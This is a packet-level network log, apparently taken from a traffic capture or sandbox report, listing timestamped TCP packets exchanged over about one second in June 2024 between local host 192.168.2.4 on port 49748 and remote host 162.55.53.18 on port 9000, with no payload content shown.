Jun 19, 2024 14:40:16.741961002 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.741961002 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.743316889 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.744530916 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.744586945 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.744640112 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.744671106 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.744674921 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.744713068 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.744743109 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.744802952 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.744837046 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.744868040 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.744872093 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.744904995 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.744931936 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.744939089 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.744976044 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.745004892 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.745124102 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.745157957 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.745186090 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.745192051 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.745228052 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.745258093 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.745261908 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.745296955 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.745326042 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.745332003 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.745367050 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.745398045 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.745403051 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.745443106 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.745471001 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.745476961 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.745512009 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.745541096 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.745544910 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.745580912 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.745609999 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.745613098 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.745753050 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.745781898 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.745783091 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.745817900 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.745847940 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.745853901 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.745888948 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.745918036 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.745922089 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.745958090 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.745986938 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.745991945 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.746030092 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.746057987 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.746063948 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.746098042 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.746124983 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.746131897 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.746195078 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.746216059 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.746248960 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.746282101 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.746284962 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.746320009 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.746320009 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.746403933 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.746407986 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.746436119 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.746445894 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.746550083 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.781543970 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.781595945 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.781625032 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.781630993 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.781656981 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.781667948 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.781698942 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.781743050 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.833769083 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.833822012 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.833828926 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.833861113 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.833861113 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.833931923 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.835274935 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.835336924 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.835354090 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.835372925 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.835386992 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.835429907 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.835455894 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.835464954 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.835469961 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.835573912 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.835578918 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.835608959 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.835617065 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.835644960 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.835696936 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.835699081 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.835732937 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.835784912 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.835793018 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.835819960 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.835834026 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.835854053 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.835876942 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.835889101 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.835896969 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.835926056 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.835928917 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.835962057 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.835969925 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.835995913 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.836031914 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.836040974 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.836141109 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.836150885 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.836184978 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.836219072 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.836230040 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.836253881 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.836288929 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.836292028 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.836318016 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.836323977 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.836333036 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.836358070 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.836391926 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.836400986 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.836429119 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.836472034 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.836570024 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.836604118 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.836637020 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.836648941 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.836671114 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.836679935 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.836704969 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.836738110 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.836749077 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.836771011 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.836805105 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.836813927 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.836838007 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.836843014 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.836874008 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.836889982 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.836932898 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.836944103 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.836982012 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.836986065 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.837017059 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.837050915 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.837059975 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.837086916 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.837100029 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.837121964 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.837156057 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.837167025 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.837187052 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.837203979 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.837224960 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.876214981 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.876276016 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.876310110 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.876312017 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.876331091 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.876351118 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.876357079 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.876449108 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.924664974 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.924729109 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.924731970 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.924773932 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.924791098 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.924823046 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.924830914 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.924874067 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.925895929 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.925931931 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.925982952 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.925987005 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926022053 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926067114 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.926074982 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926120043 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.926127911 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926165104 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926198006 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926212072 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.926237106 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.926249981 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926281929 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926325083 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.926333904 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926369905 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926403046 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926419973 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.926445007 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.926455021 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926489115 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926496983 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.926529884 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.926531076 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926562071 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926575899 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.926603079 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.926615953 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926651001 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926661968 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.926685095 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926692963 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.926721096 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926753044 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.926753044 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926772118 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.926789045 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926794052 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.926824093 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926830053 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.926858902 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926872015 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.926893950 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926906109 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.926928997 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926934958 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.926964045 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.926973104 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.926999092 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.927006006 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.927052975 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.927077055 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.927089930 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.927098036 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.927125931 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.927131891 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.927161932 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.927196026 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.927206039 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.927254915 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.927270889 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.927297115 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.927331924 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.927350044 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.927366018 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.927398920 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.927402973 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.927433968 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.927438974 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.927472115 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.927478075 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.927519083 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.927560091 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.927594900 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.927608967 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.927628994 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.927642107 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.927664995 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.927674055 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.927700043 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.927710056 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.927735090 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.927769899 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.927783012 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.927805901 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.927838087 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.927839041 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.927849054 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.927879095 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.927931070 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.962995052 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.963015079 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.963041067 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.963052034 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.963058949 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.963077068 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.963078022 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.963078022 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.963098049 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.963110924 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.012092113 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.012168884 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.012630939 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.012689114 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.015611887 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.015636921 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.015654087 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.015691996 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.015726089 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.016815901 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.016832113 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.016848087 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.016870975 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.016901970 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.016941071 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.016957045 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.016973019 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.016999006 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.017019987 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.017025948 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017044067 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017057896 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017095089 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.017137051 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.017296076 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017314911 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017330885 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017348051 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017349958 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.017374992 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.017425060 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017441034 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017457962 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017473936 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017493010 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017538071 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017540932 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.017540932 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.017541885 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.017541885 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.017573118 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.017573118 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.017580986 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.017590046 CEST	9000	49748	162.55.53.18	192.168.2.4
